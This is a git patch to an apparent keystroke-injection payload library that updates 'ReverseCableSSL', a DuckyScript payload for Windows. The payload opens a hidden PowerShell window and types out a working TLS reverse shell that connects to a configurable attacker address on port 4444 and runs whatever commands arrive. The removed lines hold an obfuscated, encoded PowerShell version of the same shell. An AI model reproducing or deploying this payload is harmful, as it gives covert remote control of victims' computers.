From 0f2a230661d87f1c4a9d0907584b92cc424a4a9a Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Wed, 7 Jun 2023 15:17:52 +0200 Subject: [PATCH] Updated ReverseCableSSL Lifted ReverseCableSSL to a more recent version of DuckyScript --- .../remote_access/ReverseCableSSL/payload.txt | 59 ++++++++++--------- 1 file changed, 32 insertions(+), 27 deletions(-) diff --git a/payloads/library/remote_access/ReverseCableSSL/payload.txt b/payloads/library/remote_access/ReverseCableSSL/payload.txt index 9cc78cc..72792cd 100644 --- a/payloads/library/remote_access/ReverseCableSSL/payload.txt +++ b/payloads/library/remote_access/ReverseCableSSL/payload.txt @@ -1,38 +1,43 @@ REM ReverseCableSSL -REM Version 1.0 +REM Version 2.0 REM OS: Windows REM Author: 0iphor13 -REM Requirements: OMG Firmware v.2.5 or higher +REM Requirements: OMG Firmware v.3.0 or higher -REM Getting encrypted remote access via obfuscated powershell code +REM Getting encrypted remote access via powershell + +REM Define your receiving Host below +DEFINE #ADDRESS '0.0.0.0' +DEFINE #PORT 4444 + +FUNCTION Detect_Finished() +CAPSLOCK +DELAY 100 +CAPSLOCK +DELAY 100 +CAPSLOCK +DELAY 100 +CAPSLOCK +END_FUNCTION DELAY 500 +REM Define your language below DUCKY_LANG de DELAY 1500 GUI r DELAY 500 -STRING powershell -NoP -NonI -w hidden -DELAY 500 -ENTER -DELAY 300 -STRING $IP='0.0.0.0';$PORT=PORT;( -joIn [reGEX]::mAtcHeS( (")''NIOj-'X'+]3,1[)(gnirtsOt.ecNErefeRpesobreV$ "+'('+'& '+(('b'+'8'+'J ')-crepLAce 'b8J',[ChAR]124)+")'$','8yj'(EcalpER.)'|',)801]RaHC[+021]RaHC[+25]RaHC[((EcalpER.)93]RaHC[]GniRtS[,)501]RaHC[+07]RaHC[+18]RaHC[((EcalpER.)')iFQiFQNIO +STRINGLN powershell -NoP -NonI -W H +DELAY 1000 +STRING $01=[Text.Encoding]::ASCII.GetBytes("`n[+] Connection received - O.MG@$env:USERNAME/$env:COMPUTERNAME `n`n"); +DEFINE #VAR #DfdGgfdbOMG +STRING $c=new-OBJecT Net.Sockets.TcpClient(#ADDRESS,#PORT); +STRING $s=$c.GetStream(); +DEFINE #DfdGgfdbOMG NeW-oBjECt +STRING $sSL=#DfdGgfdbOMG System.Net.Security.SslStream($s,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback])); +STRING $sSL.AuthenticateAsClient('01phOri3.omg', $null, "Tls12", $false); +STRING $w=#VAR System.IO.StreamWriter($sSL);$sSL.write($01,0,$01.Length);$w.Write('OMG@PS ' + (pwd).Path + '> ');$w.flush();[byte[]]$b = 0..65535|%{0};while(($i=$sSL.Read($b, 0, $b.Length)) -ne 0) +STRING {$D=(#DfdGgfdbOMG -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$Y=(iex $D | Out-String ) 2>&1; +STRING $X=$Y + 'OMG@PS ' + (Get-LoCatIon).Path + '> '; +STRINGLN $Z=([text.encoding]::ASCII).GetBytes($X);$sSL.Write($Z,0,$Z.Length);$sSL.Flush()};exIT DELAY 100 -STRING j-]52,42,4[CEPS'+'moC:VNE8yj "+('(.{0'+'}+{0} ') -F [chAR]39+'l'+'x4) '+'(Dne'+'OTDAer'+'.'+') '+(')'+'II'+'CSa::'+']g'+'nidoCNE.tX{'+'0}+{'+'0'+'}e'+'T.M'+'eTS'+'ys[, ') -F[cHaR]39+'))Ss'+'ErPMoceD::]EDo'+'MNO'+'iSsErpMOc.'+'No'+'is'+'s'+'ERpmoc.'+'OI'+'.met'+'SY'+'s'+'[ '+', '+('{0}+'+'{'+'0}) -DELAY 100 -STRING iFQ'+'==AA/hj'+'7zf1K/Vp7dl46NLLtuomB'+'Vjldn'+'vd'+'O7Q'+'uWq1vWq'+'dEK4{'+'0'+'}+{0}'+'2LO1C1nN'+'J'+'KbGpPgNZ2{0}+{'+'0}kcRl'+'w0TqY5392e'+'0VwS54cTkkC'+'5'+'s19h'+'3sI+Zgvt'+'7{0}+{'+'0}o29O7scluP{'+'0}'+'+{0}hkQQ'+'Wj'+'LZv'+'JBlFC'+'e'+'Th9'+'aG'+'5KLFOV'+'i/kg'+'Yxa'+'Nt'+'Et/1gZ'+'fyn4I -DELAY 100 -STRING b99DLte{0}+'+'{0}hwi'+'1'+'m'+'gaGk'+'g5RTQ'+'F9'+'K'+'PhoE5w'+'Vfef0CI'+'yk'+'sf'+'4'+'69'+'AZdU'+'cTsit2F'+'ZaJnXjBzU'+'Dvn'+'LmXn'+'Lg{'+'0}'+'+{'+'0}'+'kF'+'denv8tt+2I/5'+'7vfyhfh0'+'q'+'YBe'+'fWqTbiG'+'2wsmzFoYrfq3du9'+'G2v'+'ni2Pxi'+'u5'+'E+rl2/kJ6h0z2DI'+'rdGbIEs'+'C'+'yY8I'+'9Qb'+'/'+'H -DELAY 100 -STRING 4'+'pZVcpRQ6WNp'+'T'+'2bR00gHk85r'+'phUNFfbdAoeV7mI22'+'+6zpfqc'+'WTqo7zkk'+'OX'+'J'+'X6Qw'+'LdsnwdnrsQo'+'uWm'+'hzAA5IrSgng3'+'a'+'WtY18rl'+'AS/6dW68K'+'K'+'3VYR0rEv'+'6VI'+'pH2S{0}+{0}Nog'+'b'+'bcMsd'+'FGpbNXc'+'eCN'+'6tQ'+'MCri'+'gl'+'g'+'elpR'+'IPOhP'+'KeLGV'+'/'+'7p'+'J'+'ZJYq6+h'+'Ciet -DELAY 100 -STRING n'+'Qt'+'MlG'+'EfB7'+'hP'+'o'+'nAgs'+'r{0}+{0}NR'+'gf8'+'oY8H3RInOlx1'+'DxbJxwL'+'x'+'NKIkcn'+'h{0}+{0}QUqm{0}+{0}uCo'+'qD7HGJr'+'Z/dmXH'+'aiYxDK'+'P+lv{0}+{'+'0}WFrEk'+'g{0'+'}+{0}A0PBo{0}+'+'{'+'0}wuOzmwVW'+'{0}+{0}UBS/{0}+{0}Y/'+'elW'+'+tHcXNgWO5'+'wBB/Mf'+'gle6u'+'Smr0{0}'+'+{0}gsQIzh8IcULL11 -DELAY 100 -STRING kglce'+'5F'+'Z7VWZMS3KxF'+'AE3w6co7'+'V'+'JdJSWTwI'+'TO'+'JjdtUmK'+'BDNYS'+'EpJPV'+'0Sqr'+'4Dwv'+'3'+'e'+'QZomXGG'+'J'+'7g/{'+'0}+{0'+'}9G'+'VsOAS2r0/'+'+{'+'0'+'}+{0}2N'+'xdKe3e9+efHiS{0}+'+'{0}'+'od3mfSY3'+'df3ftWM'+'bE'+'SNUWt'+'A'+'Hm+AiPaTCQ6A5q'+'Q4u'+'VrOk7mKl46E'+'Xsi'+'I8ve2PEwo'+'9bv -DELAY 100 -STRING P'+'VfiFQ ')-F [chAR]39+('(gN'+'I'+'R'+'Ts4'+'6EsAbmorFrNf'+'+rNf::]TREvn'+'oC'+'[ ').replace('rNf',[STRINg][CHar]39)+((']'+'mAEr'+'TSyroMem'+'.oI'+'.m6j'+'x+6'+'jx'+'et'+'SY'+'s6jx+6jx[ ')-rEPLaCe '6jx',[Char]39)+('(MaFy'+'5+Fy5E'+'RTS'+'F'+'y5'+'+F'+'y5'+'EtAlf'+'Ed.noi'+'S'+'SERP'+'F -DELAY 100 -STRING y'+'5'+'+Fy5M'+'O'+'C.Oi ').replACE('Fy5',[STRINg][ChAr]39)+'tc'+'ejBO'+'-weN '+'( '+(('(rE'+'dA'+'eRmAE'+'P5'+'d+P5dr'+'P5d+P'+'5dTS'+'.oI ') -repLaCE 'P5d',[CHAr]39)+('tcejBORrV+Rr'+'V-'+'weNRr'+'V'+'+RrV('+' ').RepLace('RrV',[STrING][cHaR]39)+('XI'+'B( ').RePlAce(([chAR]88+[chAR]73+[chAR]6 -DELAY 100 -STRING 6),[STrIng][chAR]39)+''), '.' , ('RI'+'G'+'HTtoLefT')) )| IeX -DELAY 200 -ENTER \ No newline at end of file +Detect_Finished()